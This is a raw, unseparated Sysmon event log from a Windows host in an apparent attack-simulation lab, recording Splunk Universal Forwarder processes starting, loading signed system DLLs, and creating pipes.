734700x80000000000000001606202Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606201Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606200Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606199Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk 
Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x80000000000000001606198Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606197Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x80000000000000001606196Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.343{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606195Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606194Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606193Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606192Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606191Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 
17141700x80000000000000001606190Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x80000000000000001606368Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.715{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001606367Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.715{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001606366Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.715{21761711-7A87-6080-C560-00000000BB01}24282292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606365Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:31.699{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606364Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.699{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606363Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.594{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606362Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.594{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 
734700x80000000000000001606361Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.594{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606360Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.593{21761711-7A87-6080-C560-00000000BB01}2428\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001606359Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.593{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606358Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001606357Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606356Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606355Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606354Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606353Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606352Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606351Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606350Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 
734700x80000000000000001606349Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606348Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606347Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606346Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606345Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606344Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606343Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606342Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client 
DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606341Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606340Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606339Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606338Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL 
Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606337Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606336Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606335Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606334Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, 
http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606333Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606332Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606331Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606330Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606329Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606328Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft 